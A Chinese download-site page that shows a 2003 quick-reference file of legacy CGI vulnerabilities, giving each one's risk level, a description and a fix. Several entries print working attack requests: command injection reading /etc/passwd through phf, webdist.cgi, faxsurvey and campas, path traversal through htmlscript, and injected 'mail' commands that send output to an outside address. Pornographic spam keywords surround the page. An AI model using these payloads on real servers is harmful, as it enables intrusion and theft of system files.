亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? cgi 安全漏洞資料速查.txt

?? 很多很有用的黑客命令集
?? TXT
?? 第 1 頁 / 共 3 頁
字號:
CGI 安全漏洞資料速查 
日期:2003年10月10日 

類型:攻擊型 
名字:phf 
風(fēng)險(xiǎn)等級:中 
描述:在 NCSA 或者 Apache(1.1.1版本以內(nèi))非商業(yè)版本的 WebServer 中 
   有一段程序 util.c,允許黑客以 root 身份執(zhí)行任何一個指令: 
      http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here 
建議:無 
解決方法:把 Apache Webserver 升級到 1.1.1 以上,或者將 NCSA Webserver 
     升級到最新版本 

類型:攻擊型 
名字:wguset.exe 
風(fēng)險(xiǎn)等級:中 
描述:如果您使用 NT 做為您的 WebServer 的操作系統(tǒng),而且 wguest.exe 存 
   在于您的 Web 可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬 
   盤上所有 USR_ 用戶能閱讀的文件 
建議:將 wguset.exe 從你的 Web 目錄移走或刪除 
解決方法:將 wguset.exe 從你的 Web 目錄移走或刪除 

類型:攻擊型 
名字:rguset.exe 
風(fēng)險(xiǎn)等級:中 
描述:如果您使用 NT 做為您的 WebServer 的操作系統(tǒng),而且 rguest.exe 存 
   在于您的 Web 可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬 
   盤上所有 USR_ 用戶能閱讀的文件 
建議:將 rguset.exe 從你的 Web 目錄移走或刪除 
解決方法:將 rguset.exe 從你的 Web 目錄移走或刪除 

類型:攻擊型 
名字:perl.exe 
風(fēng)險(xiǎn)等級:低 
描述:在cgi-bin 執(zhí)行目錄下存 在perl.exe,這屬于嚴(yán)重的配置錯誤。黑客 
   可以在 perl.exe 后面加一串指令,利用瀏覽器在 server 上執(zhí)行任何 
   腳本程序 
建議:perl.exe 是放在任何帶執(zhí)行權(quán)限的 web 目錄下都是不安全的 
解決方法:在 web 目錄下移除 perl.exe 這個程序. 

類型:攻擊型 
名字:shtml.exe 
風(fēng)險(xiǎn)等級:低 
描述:如果您使用 FrontPage 作為您的 WebServer,那么入侵者能夠利用 
   IUSR_ 用戶和 shtml.exe 入侵您的機(jī)器,做您不希望的事 
建議:將 shtml.exe 從你的 Web 目錄移走或刪除 
解決方法:將 shtml.exe 從你的 Web 目錄移走或刪除 

類型:攻擊型 
名字:wwwboard.pl 
風(fēng)險(xiǎn)等級:低 
描述:wwwboard.pl 程序容易引起攻擊者對服務(wù)器進(jìn)行 D.O.S 攻擊 
建議:如無必要可以刪除該文件 
解決方法:對 get_variables 的子程序中的下面這段: 
if($FORM{\'followup\'}){$followup=\"1\"; 
@followup_num=split(/,/,$FORM{\'followup\'}); 
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate=\"$FORM{\'origdate\'}\"; 
$origname=\"$FORM{\'origname\'}\"; 
$origsubject=\"$FORM{\'origsubject\'}\";} 

替換為: 

if($FORM{\'followup\'}){ 
$followup=\"1\"; 
@followup_num=split(/,/,$FORM{\'followup\'}); 
$num_followups=@followups=@followup_num; 
$last_message=pop(@followups); 
$origdate=\"$FORM{\'origdate\'}\"; 
$origname=\"$FORM{\'origname\'}\"; 
$origsubject=\"$FORM{\'origsubject\'}\"; 
#WWWBoardBombPatch 
#WrittenBy:SamuelSparlingsparling@slip.net) 
$fn=0; 
while($fn<$num_followups) 
{ 
$cur_fup=@followups$fn]; 
$dfn=0; 
foreach$fm(@followups) 
{ 
if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn) 
{ 
&error(board_bomb); 
} 
$dfn++; 
} 
$fn++; 
} 
#EndWWWBoardBombPatch 
} 

類型:攻擊型 
名字:uploader.exe 
風(fēng)險(xiǎn)等級:中 
描述:如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用 
   uploader.exe上傳任何文件 
建議:將uploader.exe從你的Web目錄移走或刪除 
解決方法:將uploader.exe從你的Web目錄移走或刪除 

類型:攻擊型 
名字:bdir.htr 
風(fēng)險(xiǎn)等級:高 
描述:如果您使用NT做為您的WebServer的操作系統(tǒng),而且bdir.htr存在 
   于您的Web可執(zhí)行目錄中的話,入侵者將能利用它在您的服務(wù)器上 
   無止境的創(chuàng)建ODBC數(shù)據(jù)庫,并生成一些可執(zhí)行的文件。 
建議:將bdir.htr從你的Web目錄移走或刪除 
解決方法:將bdir.htr從你的Web目錄移走或刪除 

類型:攻擊型 
名字:Count.cgi 
風(fēng)險(xiǎn)等級:高 
描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出 
   錯誤,允許入侵者無須登錄而遠(yuǎn)程執(zhí)行任何指令。 
建議:如無必要可以刪除該文件 
解決方法:將wwwcount升級到2.4或者以上 

類型:攻擊型 
名字:test-cgi 
風(fēng)險(xiǎn)等級:高 
描述:test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息 
建議:建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限 
解決方法:刪除test-cgi文件 

類型:攻擊型 
名字:nph-test-cgi 
風(fēng)險(xiǎn)等級:高 
描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息 
建議:建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限 
解決方法:刪除nph-test-cgi文件 

類型:攻擊型 
名字:php.cgi 
風(fēng)險(xiǎn)等級:低 
描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導(dǎo)致任何系 
   統(tǒng)文件可以被入侵者讀取的漏洞 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除php.cgi程序是最好的辦法 

類型:攻擊型 
名字:handler 
風(fēng)險(xiǎn)等級:低 
描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出 
   錯誤,允許入侵者在server上遠(yuǎn)程執(zhí)行一段程序: 
   telnettarget.machine.com80 
   GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download 
   HTTP/1.0 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除handler文件 

類型:攻擊型 
名字:webgais 
風(fēng)險(xiǎn)等級:高 
描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個 
   毛病使入侵者可以繞過程序的安全機(jī)制,執(zhí)行系統(tǒng)命令: 
   POST/cgi-bin/webgaisHTTP/1.0 
   Content-length:85(replacethiswiththeactuallengthof 
   the\"exploit\"line) 
   telnettarget.machine.com80query=\';mail+you\\@your.host 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除webgais文件 

類型:攻擊型 
名字:websendmail 
風(fēng)險(xiǎn)等級:高 
描述:/cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個系統(tǒng)指令: 
   telnettarget.machine.com80 
   POST/cgi-bin/websendmailHTTP/1.0 
   Content-length:xxx(shouldbereplacedwiththeactual 
   lengthofthestringpassedtotheserver,inthiscase 
   xxx=90) receiver=;mail+your_address\\@somewhere.org 
   &content=a 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符 
一般用戶:刪除websendmail文件 

類型:攻擊型 
名字:webdist.cgi 
風(fēng)險(xiǎn)等級:高 
描述:對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點(diǎn) 
   允許入侵者無須登錄而在系統(tǒng)上執(zhí)行任何指令: 
   http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi 

類型:攻擊型 
名字:faxsurvey 
風(fēng)險(xiǎn)等級:高 
描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無 
   須登錄就能在服務(wù)器執(zhí)行指令:http://joepc.linux.elsewhere.org/ 
   cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin/faxsurvey文件 

類型:攻擊型 
名字:htmlscript 
風(fēng)險(xiǎn)等級:中 
描述:安裝了htmlscript2.99x或者更早版本的服務(wù)器,存在一個毛病使 
   入侵者可以查看服務(wù)器上的任何文件: 
   http://www.vulnerable.server.com/cgi-bin/htmlscript?../../ 
   ../../etc/passwd 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到 
     3.0以上 

類型:攻擊型 
名字:pfdisplay 
風(fēng)險(xiǎn)等級:中 
描述:在Irix6.4或者更早版本的web服務(wù)器上,/cgi-bin/pfdisplay程序 
   允許入侵者非法查看服務(wù)器上的文件 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin/pfdisplay文件,或者打補(bǔ)丁,補(bǔ)丁可以去 
     sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載: 
     Filename:README.patch.3018 
     Algorithm#1(sum-r):3795511README.patch.3018 
     Algorithm#2(sum):1545511README.patch.3018 
     MD5checksum:1169EB51D75E0794C64C2C1FD6211B69 
     Filename:patchSG0003018 
     Algorithm#1(sum-r):016792patchSG0003018 
     Algorithm#2(sum):128762patchSG0003018 
     MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8 
     Filename:patchSG0003018.idb 
     Algorithm#1(sum-r):013392patchSG0003018.idb 
     Algorithm#2(sum):2512patchSG0003018.idb 
     MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB 
     Filename:patchSG0003018.performer_tools_man 
     Algorithm#1(sum-r):102018patchSG0003018.per- 
     -former_tools_man 
     Algorithm#2(sum):31448patchSG0003018.performer_t- 
     -ools_man 
     MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29 
     Filename:patchSG0003018.performer_tools_sw 
     Algorithm#1(sum-r):4847418patchSG0003018.perform- 
     -er_tools_sw 
     Algorithm#2(sum):2817618patchSG0003018.performer_ 
     tools_sw 
     MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F 

類型:攻擊型 
名字:www-sql 
風(fēng)險(xiǎn)等級:中 
描述:www-sql存在于/cgi-bin/目錄下,這將導(dǎo)致入侵可以越權(quán)訪問被保 
   護(hù)的文件 
建議:最好刪除www-sql文件 
解決方法:#ifPHPFASTCGI 
     while(FCGI_Accept()>=0) 
     { 
     #endif 
     s=getenv(\"REDIRECT_STATUS\"); 
     if(!s){ 
     puts(\"Content-type:text/plain\\r\\n\\r\\nPHP/FIdetected 
     aninternalerror.Pleaseinformsa@hogia.netofwhat 
     youjustdid.\\n\"); 
     exit(1); 
     } 
     s=getenv(\"PATH_TRANSLATED\"); 

類型:攻擊型 
名字:view-source 
風(fēng)險(xiǎn)等級:高 
描述:在cgi-bin目錄下的view-source程序沒有對輸入進(jìn)行安全檢查,使 
   入侵者可以查看服務(wù)器上的任何文件 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin目錄下的viewsource程序 

類型:攻擊型 
名字:campas 
風(fēng)險(xiǎn)等級:高 
描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看 
   server上的重要文件: 
   telnetwww.xxxx.net80 
   Trying200.xx.xx.xx... 
   Connectedtovenus.xxxx.net 
   Escapecharacteris\'^]\'. 
   GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin目錄下的campas程序 

類型:攻擊型 
名字:aglimpse 
風(fēng)險(xiǎn)等級:高 
描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登 
   錄而隨意執(zhí)行任何指令  
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin目錄下的aglimpse程序 

類型:攻擊型 
名字:AT-admin.cgi 
風(fēng)險(xiǎn)等級:中 
描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允 
   許普通用戶完全控制整個系統(tǒng) 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序 

類型:攻擊型 
名字:finger 
風(fēng)險(xiǎn)等級:中 
描述:這個位于/cgi-bin下的finger程序,可以查看其它服務(wù)器的信息, 
   但是如果將參數(shù)改成本機(jī),本機(jī)上的帳號信息將暴露無遺: 
   /cgi-bin/finger?@localhost 
建議:建議審核cgi-bin目錄,避免有不必要的程序存在 
解決方法:刪除/cgi-bin目錄下的finger程序 

類型:攻擊型 
名字:webwho.pl 
風(fēng)險(xiǎn)等級:中 
描述:如果在您的Web可執(zhí)行目錄中有webwho.pl這個CGI腳本,那么入侵 
   者將能利用他閱讀啟動Web的用戶能讀寫執(zhí)行的任何文件。 
建議:將webwho.pl從您的Web目錄中刪除或移走 
解決方法:將webwho.pl從您的Web目錄中刪除或移走 

類型:攻擊型 
名字:w3-msql 
風(fēng)險(xiǎn)等級:低 

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲视频在线一区二区| 国产成人免费视频网站| 91美女蜜桃在线| 亚洲女同ⅹxx女同tv| 色88888久久久久久影院野外| 中文字幕一区二区三区在线播放 | 欧美国产一区视频在线观看| 精品一二三四区| 中文字幕av资源一区| 成人免费av网站| 亚洲美女视频一区| 欧美日韩一区二区在线观看视频 | 男人的j进女人的j一区| 日韩欧美一区在线| 国产自产v一区二区三区c| 亚洲国产精品t66y| 91久久精品一区二区| 日韩精品电影在线| 国产免费久久精品| 色先锋aa成人| 免费成人结看片| 国产精品成人免费在线| 欧美美女bb生活片| 国产成人丝袜美腿| 亚洲 欧美综合在线网络| 337p粉嫩大胆噜噜噜噜噜91av| 成人三级在线视频| 亚洲v中文字幕| 国产精品天干天干在观线| 欧美三级中文字幕| 丰满少妇在线播放bd日韩电影| 亚洲一区二区av电影| 久久夜色精品国产噜噜av| 色屁屁一区二区| 韩国精品一区二区| 亚洲综合区在线| 国产日产亚洲精品系列| 欧美精品一二三四| av成人免费在线| 日韩 欧美一区二区三区| 国产精品免费视频观看| 日韩欧美在线123| 91精品国产综合久久久蜜臀图片| 欧美精品1区2区3区| 精品夜夜嗨av一区二区三区| 亚洲日本在线看| 久久久久青草大香线综合精品| 欧美中文字幕一区二区三区| 国产黄色精品视频| 蜜桃av一区二区三区电影| 亚洲精品视频观看| 中文在线一区二区| 91精品国产美女浴室洗澡无遮挡| 91在线看国产| 风流少妇一区二区| 激情伊人五月天久久综合| 肉肉av福利一精品导航| 一区二区三区四区蜜桃| 国产精品久久一级| 久久看人人爽人人| 精品国内二区三区| 日韩欧美国产三级| 欧美剧情片在线观看| 99国产一区二区三精品乱码| 国产精品亚洲综合一区在线观看| 免费成人在线网站| 人人精品人人爱| 亚洲免费看黄网站| 国产色综合久久| 欧美成人艳星乳罩| 7777精品伊人久久久大香线蕉经典版下载| 成人午夜电影久久影院| 国产最新精品免费| 黑人精品欧美一区二区蜜桃| 男人的天堂亚洲一区| 日本va欧美va精品发布| 视频一区二区欧美| 丝袜美腿一区二区三区| 日韩制服丝袜av| 日本美女一区二区| 看电视剧不卡顿的网站| 久久99精品久久久久久动态图| 日本v片在线高清不卡在线观看| 婷婷国产v国产偷v亚洲高清| 亚洲h在线观看| 青青草成人在线观看| 蜜臀av一级做a爰片久久| 久久国产精品99精品国产| 国内外精品视频| 国产成人在线免费| 99久久免费精品| 91国产精品成人| 制服丝袜亚洲色图| 精品久久久久久综合日本欧美| 精品国产欧美一区二区| 欧美国产精品中文字幕| 亚洲女厕所小便bbb| 香蕉av福利精品导航| 久久狠狠亚洲综合| 成人免费电影视频| 欧美日韩在线一区二区| 欧美v日韩v国产v| 国产精品国产三级国产a| 一区二区三区蜜桃网| 日本网站在线观看一区二区三区 | 中文字幕一区二区三区视频| 一区二区三区在线视频观看58| 亚洲成人av免费| 久88久久88久久久| 91同城在线观看| 7777精品伊人久久久大香线蕉完整版 | 日韩一级免费观看| 日本一区二区不卡视频| 亚洲一二三四久久| 黄色精品一二区| 91香蕉视频在线| 日韩女优视频免费观看| 亚洲人成人一区二区在线观看| 日韩中文字幕91| 成熟亚洲日本毛茸茸凸凹| 欧美色欧美亚洲另类二区| 久久综合久久久久88| 亚洲免费视频成人| 国产曰批免费观看久久久| 日本久久电影网| 久久久亚洲综合| 亚洲成人av免费| www.亚洲免费av| 欧美va亚洲va| 亚洲一区二区三区四区五区黄| 国精产品一区一区三区mba视频| 在线观看日韩国产| 欧美激情一区二区在线| 日韩av中文在线观看| 99久久婷婷国产综合精品电影| 日韩免费看的电影| 一区二区三区国产精华| 国产精品99久久久久久久女警| 欧美日韩国产成人在线91| 中文字幕在线观看一区二区| 精品一区二区在线视频| 欧美日韩不卡一区| 亚洲欧美另类小说| 国产91高潮流白浆在线麻豆| 欧美一区二区三区免费在线看| 国产精品不卡在线| 国产一区二区三区美女| 欧美一区二区播放| 亚洲成人一区二区| 色婷婷久久99综合精品jk白丝| 国产婷婷精品av在线| 精品亚洲porn| 欧美大肚乱孕交hd孕妇| 爽爽淫人综合网网站| 欧美图区在线视频| 亚洲特黄一级片| 成人av资源网站| 国产视频一区二区在线观看| 久久99精品国产麻豆不卡| 91精品国产乱| 日本欧美加勒比视频| 日韩欧美一区二区不卡| 欧美三级在线视频| 欧美在线免费视屏| 一区二区三区免费在线观看| 色综合天天综合网天天看片| 国产精品入口麻豆原神| 国产成人在线视频免费播放| 国产午夜精品一区二区| 激情综合色综合久久| 欧美tickle裸体挠脚心vk| 精品伊人久久久久7777人| 精品欧美黑人一区二区三区| 久久综合综合久久综合| 精品久久久久香蕉网| 国内精品国产成人国产三级粉色| 日韩精品一区二区三区蜜臀| 精品一区二区三区香蕉蜜桃| 精品免费视频一区二区| 国产一区二三区好的| 亚洲国产精品高清| 99精品桃花视频在线观看| 亚洲黄色录像片| 欧美丰满嫩嫩电影| 蜜桃精品在线观看| 久久精品一区四区| av福利精品导航| 精品国产污污免费网站入口 | 亚洲欧美日韩国产一区二区三区| 91亚洲国产成人精品一区二三| 亚洲免费观看视频| 欧美美女视频在线观看| 久久成人av少妇免费| 国产人妖乱国产精品人妖| 91色九色蝌蚪| 日本不卡不码高清免费观看| 国产色产综合色产在线视频| 色综合一区二区| 奇米在线7777在线精品| 中文成人综合网|